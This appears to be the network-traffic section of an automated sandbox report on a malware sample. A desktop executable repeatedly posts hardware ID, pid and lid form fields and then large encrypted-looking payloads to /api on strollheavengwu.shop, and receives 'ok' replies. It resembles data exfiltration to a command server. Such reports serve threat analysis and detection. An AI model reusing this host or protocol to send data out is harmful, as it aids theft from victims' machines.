2024-04-26 03:44:01 UTC	12839	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
2024-04-26 03:44:01 UTC	804	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 03:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bc3ev56gsb6rgo2ev5fr25trv5; expires=Mon, 19-Aug-2024 21:30:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SzPqZ5eKLT4Xhu8ZN7nMOtqFZuDd2OIkgJdl2yEfYO%2FJAwLNvchzKvEb0zQxFHUtf08kt9J5q0yr5PLXJ0cZaFTjwtBU0xbNjgwTFc710HYvQY39HxzvDUJ4MuVLmQRLZ6pWjZGEVg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a39269580274ac-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 03:44:01 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a Data Ascii: 12ok 102.129.152.220
2024-04-26 03:44:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	172.67.163.209	443	5444	C:\Users\user\Desktop\VoGtelkHSn.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 03:44:02 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15081 Host: strollheavengwu.shop
2024-04-26 03:44:02 UTC	15081	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
2024-04-26 03:44:03 UTC	808	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 03:44:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t1lghn86kja0dm4ukh5nklg211; expires=Mon, 19-Aug-2024 21:30:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3gu%2FZDh82aQg2zsFZoEF%2B3ukuPoDN6uyO8L8CPdoLJXBIOcsCttG3OHujZJgVLQ8FxYvsYdLqX5qc4OhbDv6nmeAxRltZDn1DFH8NINrZrgOYVQ%2FWzBoFCkisgTiL377MjvVZAHtQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a3926f9d540359-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 03:44:03 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a Data Ascii: 12ok 102.129.152.220
2024-04-26 03:44:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	172.67.163.209	443	5444	C:\Users\user\Desktop\VoGtelkHSn.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 03:44:03 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20571 Host: strollheavengwu.shop
2024-04-26 03:44:03 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
2024-04-26 03:44:03 UTC	5240	OUT	Data Raw: 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: >56vMMZh'F3Wun 4F([:7s~X`nO
2024-04-26 03:44:04 UTC	804	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 03:44:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qhtom30u2bono7scbrq45rqu8j; expires=Mon, 19-Aug-2024 21:30:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5TSK3d9n8APRfDO7vwzMfJnHUXXTPp7gYREgA6oVEvLeyW80ChcOuAvbk66ad6La1qLJggatLepK4M46%2FFP6UgvSpmYxEg9UAzhMi2tQnKEeMvfk0STwCO30Kyp0kobos6an4JmUQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a392772bb84c04-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 03:44:04 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a Data Ascii: 12ok 102.129.152.220
2024-04-26 03:44:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	172.67.163.209	443	5444	C:\Users\user\Desktop\VoGtelkHSn.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 03:44:04 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5448 Host: strollheavengwu.shop
2024-04-26 03:44:04 UTC	5448	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
2024-04-26 03:44:05 UTC	808	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 03:44:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p9o1a3mfgn7nm36uat6524a81i; expires=Mon, 19-Aug-2024 21:30:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NsEzYk9sndonO4Wb%2BL1%2FEXtijtybxcHszSSfGq0VxznKVO2B1AyXjtRWAedgtCXFP8eJeBIMDRHVDatOh0v33tQB9hTgzbH6En5ceySz7mkSVmcpSEP3nQqCjMS%2BwoM6YNEf4UHNqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a3927f0a16287a-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 03:44:05 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a Data Ascii: 12ok 102.129.152.220
2024-04-26 03:44:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	172.67.163.209	443	5444	C:\Users\user\Desktop\VoGtelkHSn.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 03:44:05 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1385 Host: strollheavengwu.shop
2024-04-26 03:44:05 UTC	1385	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
2024-04-26 03:44:06 UTC	814	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 03:44:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=02b96qcm10fqta1cqt15up2pvt; expires=Mon, 19-Aug-2024 21:30:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DopSyKQk%2B4%2FzqFYeUTpFMbuBTk7Iud047dkPI7GZL4YucRFYwzm68nV6FXpLukpiUmLWZMNz%2FLgFavToo4AscXy9oU9bhiVV7X7Lk7cy%2BD4hm9FtQV9%2F%2BMD1jFKhCtf2cp7YpDepXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a39285ae87d9f9-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 03:44:06 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 0d 0a Data Ascii: 12ok 102.129.152.220
2024-04-26 03:44:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49711	172.67.163.209	443	5444	C:\Users\user\Desktop\VoGtelkHSn.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 03:44:07 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 577060 Host: strollheavengwu.shop
2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: a2 56 37 7f 4f 45 df 14 02 0f 6b e8 17 41 7b 19 6f f6 ac 0e 30 18 65 ec 12 92 27 a7 ca ce d5 8a 30 28 10 e6 09 27 2f 11 7a 3b a0 39 21 ec 73 6a 15 0a ce 6c 80 97 c6 c4 0c 78 ab 61 ea 0f cc bd 16 ac 33 fc 31 d3 ba fd f0 94 40 67 69 2e 16 36 5a b2 cd 2b de 91 f2 72 1b 75 73 6a d6 bc 4a 61 a6 54 79 35 94 11 9f 33 cf 18 4e c2 1c eb f5 76 02 51 20 46 1a 9c 6d 6f cc c9 6b 45 77 3e 86 bb 84 7f ee 01 2f bc c5 e8 f3 6d 91 ac 83 4a 0b 5d d7 29 58 f8 b6 18 4e df 5d 8f 9b c4 cd 0c 5a 75 53 1a be a0 e2 29 2a 8f 5d bf ac a0 95 06 0b 92 bb 8f eb ea 67 3c a4 d6 4f a0 1b 32 33 a2 cd b1 31 53 e5 13 c8 cc 6c 54 a1 28 8f 8e d4 bb 3e fc 49 4f 6a 4f 62 fb a7 9f 5f 70 3f 4c 13 64 1b a0 93 45 c9 46 18 41 a8 0b 9b 20 71 d7 62 d3 09 03 53 a1 89 a5 cd 92 54 29 4a 7a 43 a4 a1 10 f1 Data Ascii: V7OEkA{o0e'0('/z;9!sjlxa31@gi.6Z+rusjJaTy53NvQ FmokEw>/mJ])XN]ZuS)*]g<O231SlT(>IOjOb_p?LdEFA qbST)JzC
2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: 69 43 d9 ad 66 41 f8 e9 48 63 74 32 31 39 d7 42 63 73 37 a8 51 5f 7f fb be 3a 75 01 79 4d 1a 38 8f 7a 87 34 9a fa 0a 89 94 5a b1 52 61 62 d9 12 7c 4d 73 58 ee e2 a6 b6 9f 3a 65 9f 00 ab 08 1f 4b bf 43 4e 3a e1 26 24 2e d5 fd 99 29 ae 34 76 03 1b 4b e0 70 2a f1 4a 72 b8 ee 6d c4 41 7b 47 07 bd 9e 24 e4 57 b9 3e e8 fc 34 95 1c 71 f7 b8 7f f5 16 9d 27 cc 30 b3 aa bc a7 a5 fe be 3b 49 b1 61 d4 0d f1 55 ed 89 b7 fb aa ff e2 f4 7d e8 d5 64 d7 88 a4 84 cf 0f 53 3b 57 dd 1f 86 13 51 fd 8f 69 81 42 e7 de af 57 72 5d 7f 95 f3 4d 1f 3c 35 f3 4f c3 27 e7 1f fd 47 71 73 46 e3 6a e9 d0 55 e7 b1 7d 65 1b 3d cc 92 01 bf 80 8f c3 a1 6f b9 5d 79 9b 9f 4d 0d 22 6e 3a 97 86 5c 6e 06 ac 87 e5 91 a3 b9 15 ab a1 c1 c3 45 42 43 5f 76 65 28 d2 47 92 6c ab e9 11 6c 4b db d8 3c b6 Data Ascii: iCfAHct219Bcs7Q_:uyM8z4ZRab\|MsX:eKCN:&$.)4vKp*JrmA{G$W>4q'0;IaU}dS;WQiBWr]M<5O'GqsFjU}e=o]yM"n:\nEBC_ve(GllK<
2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: 54 b2 54 5e 50 78 cd 82 da 35 d0 73 95 a9 42 bd 67 3a b1 e5 6d e3 7d 56 f1 e3 93 33 83 30 ef 18 92 ba 49 5b e5 ad 12 aa fc f6 7e 7c 92 3b bb 72 88 eb c6 fa 41 76 ca 5f 91 07 bc 8a 75 b6 b3 0d 11 8f e9 56 e5 f6 9d a2 4c 62 db fb 21 91 d5 2e 9f 0c 8b 75 18 91 0a b1 2d d1 86 b9 b7 22 b4 a6 d9 81 bd 81 63 10 23 b2 00 4d f9 25 4b 93 dd 03 ca f6 40 86 dc 60 5c 33 43 07 0b f7 b1 69 0e a0 80 0e b2 ff 26 7c 22 71 4f d5 a8 18 28 42 a0 20 d0 23 70 be 90 1b fa 74 a1 7d 77 03 03 5e 21 84 17 17 68 24 90 3f 29 e7 99 62 33 ef eb 6b 71 e7 5d 3a 76 16 8e 1e 7f 5d a7 a6 ef 01 d3 bd 14 23 40 4e 47 c4 89 6e 98 82 ee b3 c2 ac 0f 12 2d 88 f2 2f c1 38 d8 c6 5a e9 d9 f0 30 af 63 cd a9 94 ee 3e 7d 54 77 35 51 11 35 9c 48 a4 e9 2a a2 d2 0a 8e a9 73 21 5f 53 e1 66 96 6d 90 27 28 3a Data Ascii: TT^Px5sBg:m}V30I[~\|;rAv_uVLb!.u-"c#M%K@`\3Ci&\|"qO(B #pt}w^!h$?)b3kq]:v]#@NGn-/8Z0c>}Tw5Q5H*s!_Sfm'(:
2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: 12 4d 13 e8 b8 b2 3e f3 9c e2 d6 d3 07 71 ad 36 75 01 3d d8 ac 03 d2 32 bb bb fd 5b 52 d4 b6 3e 2d 83 bf b8 5b 05 d7 8c 48 ed 7b 32 f3 8c 27 a0 87 5f c9 55 fe c4 a2 4d 81 a9 4b 45 2b 35 35 15 3e 52 ef f6 45 f1 da 5d 80 75 59 a5 f8 9f 0e bf 33 d4 6c d3 16 04 ed bc 46 a4 fa 7a 41 7f 88 33 4d 7c b6 f0 8b 3b 7b 92 d0 de 13 a4 c0 6c 78 02 c9 0e c2 77 31 33 23 8c c0 39 e6 57 4b e7 6c 3f ec 22 c0 6f 3d 15 94 5c e7 d7 81 ce 54 61 3b f5 3d b8 64 9a e7 2e c8 c1 45 6c 87 7f 86 0c 5c c9 a5 28 cf 4e 3c 94 d4 0c d7 50 bd e8 35 38 6b 55 e3 99 56 80 7b 54 33 33 e6 f7 dc 27 6a ac 09 cc 0d 26 90 47 c6 f2 9b 89 3b 83 27 8a 71 76 0e ef 97 b7 cc 11 d5 1b f7 33 9d 4f 5e 19 4b 5b b8 30 e0 d3 db e0 a8 67 83 9d bc 8e 49 41 53 5f 06 c7 6e 48 26 51 85 51 02 27 c6 21 52 30 71 1a 31 Data Ascii: M>q6u=2[R>-[H{2'_UMKE+55>RE]uY3lFzA3M\|;{lxw13#9WKl?"o=\Ta;=d.El\(N<P58kUV{T33'j&G;'qv3O^K[0gIAS_nH&QQ'!R0q1
2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: 31 04 ac a1 8d e0 cf 96 4e 41 1f c3 e1 33 0d 88 07 48 4c 50 c0 63 70 32 9f 35 ef fc 7d 60 92 cf 66 76 96 f4 f6 6b d4 48 5f 6e f8 9b f5 86 56 66 ca c7 bd f2 87 54 9e 7f 78 f7 17 92 ae dc 3f 89 bf 1b 06 05 fe 33 1e d9 86 05 36 82 3b e9 6b 09 b0 89 a1 85 e2 c2 74 7f 19 6a b1 f1 0f 28 77 30 a1 eb ea 03 10 30 bd c5 57 43 bb d8 1f e6 d3 79 90 24 a3 cc 9d e1 29 3d 8f 07 fe cb 8f c2 48 aa 3c 3c 6f f8 f1 76 dc 19 07 31 98 fe db bc 1e 58 10 c5 6b ba 35 05 f8 2b 7a de a0 db 6e 4e 16 b6 8a 96 01 68 fb 01 e2 9d d3 4c b0 f0 c5 5a 1b e3 41 0c 4b 04 63 47 74 33 1d 5e dc 9f b6 8c 6f 0d 33 30 33 72 28 9e fb 24 7b c3 5c c3 1e 16 e5 df c5 be 21 5d f0 94 02 b6 94 18 1d 3e 6d 05 c2 83 a1 f2 fb 89 69 c9 f0 08 f7 08 3d 16 a2 47 13 02 6a 42 b6 3f 0a 78 c8 be 0d 25 57 7c b9 a2 ba Data Ascii: 1NA3HLPcp25}`fvkH_nVfTx?36;ktj(w00WCy$)=H<<ov1Xk5+znNhLZAKcGt3^o303r(${\!]>mi=GjB?x%W\|
2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: c2 95 39 9f 79 6c 07 29 bc cb b7 0a d5 e7 79 b8 8a b7 13 87 ab d3 92 57 12 43 cd 53 a3 6c 03 68 4b 2f ba 24 6d 08 8a 34 5b 73 e1 98 a7 61 8b 97 5c a1 9a a5 ec 76 27 94 5e ff bc 3b 9f 29 8e 6f 2e 68 9a 3f 37 bb dd d9 cc d0 61 a9 d9 0c 6f 88 de 9a 2a 37 6d 61 bf 7b a5 91 f0 4a be f2 d4 6f d6 93 96 cd 06 ff e1 83 a4 8e 5f 6e 5c 4e 73 29 21 29 73 dc 3a 19 fa c0 7c 05 fa 17 b7 c8 9b 3d 52 f8 54 af d4 c6 fc fe 51 80 db c5 18 91 19 21 a6 f1 6c d8 ce 5e 1e ab 19 78 57 fe c7 78 61 57 e7 a8 30 8a a4 0f fc e4 88 44 e9 8d c9 96 42 90 e0 61 8c db 78 c8 fe c8 ff 32 17 83 31 e1 2b e4 2c 16 0a 6f 7f dd d8 5c 59 2c ec 12 76 83 e8 c7 f5 bf c4 6b b2 26 b9 ae 06 8b e3 e3 e7 68 25 3c 49 c7 08 2a 02 54 dc ee cf f3 c4 2b bc 3d 45 ed 89 1a 42 1f c8 03 68 30 9d f6 f4 8e ed 86 b3 Data Ascii: 9yl)yWCSlhK/$m4[sa\v'^;)o.h?7ao7ma{Jo_n\Ns)!)s:\|=RTQ!l^xWxaW0DBax21+,o\Y,vk&h%<IT+=EBh0
